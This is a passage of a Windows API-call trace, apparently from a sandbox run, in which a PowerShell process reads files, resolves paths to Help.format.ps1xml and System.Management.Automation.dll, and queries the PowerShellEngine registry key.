	[0160.934] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.934] GetLastError () returned 0x0
	[0160.935] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.935] GetLastError () returned 0x0
	[0160.935] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.935] GetLastError () returned 0x0
	[0160.935] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.935] GetLastError () returned 0x0
	[0160.935] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.935] GetLastError () returned 0x0
	[0160.935] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.936] GetLastError () returned 0x0
	[0160.936] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.936] GetLastError () returned 0x0
	[0160.936] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.936] GetLastError () returned 0x0
	[0160.936] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.936] GetLastError () returned 0x0
	[0160.936] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.936] GetLastError () returned 0x0
	[0160.937] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.937] GetLastError () returned 0x0
	[0160.937] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.937] GetLastError () returned 0x0
	[0160.937] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.937] GetLastError () returned 0x0
	[0160.937] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.937] GetLastError () returned 0x0
	[0160.938] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.938] GetLastError () returned 0x0
	[0160.938] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.938] GetLastError () returned 0x0
	[0160.938] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0xf37, lpOverlapped=0x0) returned 1
	[0160.938] GetLastError () returned 0x0
	[0160.938] ReadFile (in: hFile=0x34c, lpBuffer=0x2e73013, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e73013*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0160.938] GetLastError () returned 0x0
	[0160.938] ReadFile (in: hFile=0x34c, lpBuffer=0x2e7393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e7393c*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0160.938] GetLastError () returned 0x0
	[0160.939] CloseHandle (hObject=0x34c) returned 1
	[0160.939] GetLastError () returned 0x0
	[0160.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.939] GetLastError () returned 0x0
	[0160.939] SetErrorMode (uMode=0x1) returned 0x1
	[0160.939] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e94938 | out: lpFileInformation=0x2e94938*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0160.939] GetLastError () returned 0x0
	[0160.939] SetErrorMode (uMode=0x1) returned 0x1
	[0160.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.939] GetLastError () returned 0x0
	[0160.939] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0160.939] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.939] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.940] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.940] GetLastError () returned 0x0
	[0160.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.940] GetLastError () returned 0x0
	[0161.156] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x9f5025eb, Data2=0x9d74, Data3=0x4c81, Data4=([0]=0x84, [1]=0xca, [2]=0xb4, [3]=0x5, [4]=0x25, [5]=0xd3, [6]=0x4, [7]=0x8d))) returned 0x0
	[0161.156] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x2f6f94e1, Data2=0xd6ca, Data3=0x4462, Data4=([0]=0xb5, [1]=0xe4, [2]=0x5a, [3]=0xae, [4]=0x98, [5]=0xee, [6]=0x2a, [7]=0xb2))) returned 0x0
	[0161.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.157] GetLastError () returned 0x0
	[0161.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.157] GetLastError () returned 0x0
	[0161.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.157] GetLastError () returned 0x0
	[0161.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.157] GetLastError () returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.659] GetLastError () returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.659] GetLastError () returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.659] GetLastError () returned 0x0
	[0161.659] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf97f7a27, Data2=0xdd, Data3=0x4af7, Data4=([0]=0xbf, [1]=0x4a, [2]=0x4c, [3]=0x8c, [4]=0x7e, [5]=0x5d, [6]=0x2e, [7]=0xaa))) returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.659] GetLastError () returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.659] GetLastError () returned 0x0
	[0161.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.660] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.661] GetLastError () returned 0x0
	[0161.663] VirtualQuery (in: lpAddress=0x14cc94, lpBuffer=0x14dc94, dwLength=0x1c | out: lpBuffer=0x14dc94*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.664] VirtualQuery (in: lpAddress=0x14ccd0, lpBuffer=0x14dcd0, dwLength=0x1c | out: lpBuffer=0x14dcd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.664] GetLastError () returned 0x0
	[0161.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.664] GetLastError () returned 0x0
	[0161.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.664] GetLastError () returned 0x0
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.665] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.665] GetLastError () returned 0x0
	[0161.666] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.666] GetLastError () returned 0x0
	[0161.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.666] GetLastError () returned 0x0
	[0161.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.666] GetLastError () returned 0x0
